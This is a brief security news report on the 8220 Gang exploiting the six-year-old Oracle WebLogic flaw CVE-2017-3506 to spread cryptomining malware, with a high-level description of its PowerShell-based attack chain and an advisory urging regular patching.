Old Oracle WebLogic vulnerability currently used in cryptomining attacks
Take action: Ignoring a vulnerability beacause 'it can't be exploited' is a bad decision. Any vulnerability will be eventually exploited, even six years down the line. Maintain reasonable patching discipline and don't feel too lucky. Nobody is.
Learn More
The hacking group known as 8220 Gang has been found exploiting a security vulnerability in Oracle WebLogic servers that dates back six years.
By taking advantage of the flaw (CVE-2017-3506), which allows remote execution of arbitrary commands, the group has managed to compromise vulnerable instances and create a botnet for distributing cryptocurrency mining malware.
The severity of the flaw enables unauthorized access to sensitive data and puts the entire system at risk. The 8220 Gang, named after its use of port 8220 for command-and-control communications, scans the internet for misconfigured or vulnerable hosts to target.
In addition to exploiting the WebLogic vulnerability, the group has utilized SSH brute force attacks to move laterally within compromised networks. In the latest attack chain, the Oracle WebLogic vulnerability is exploited to deliver a PowerShell payload, which then creates another obfuscated PowerShell script in memory.
This script disables Windows Antimalware Scan Interface (AMSI) detection and launches a Windows binary that connects to a remote server to retrieve a third obfuscated payload. The payload is downloaded via an intermediate DLL file from one of the group's command-and-control servers using TCP ports 9090, 9091, or 9092. Recent attacks have also involved the misuse of a legitimate Linux tool called lwp-download to save arbitrary files on compromised hosts, posing challenges for security teams to detect and block such attacks
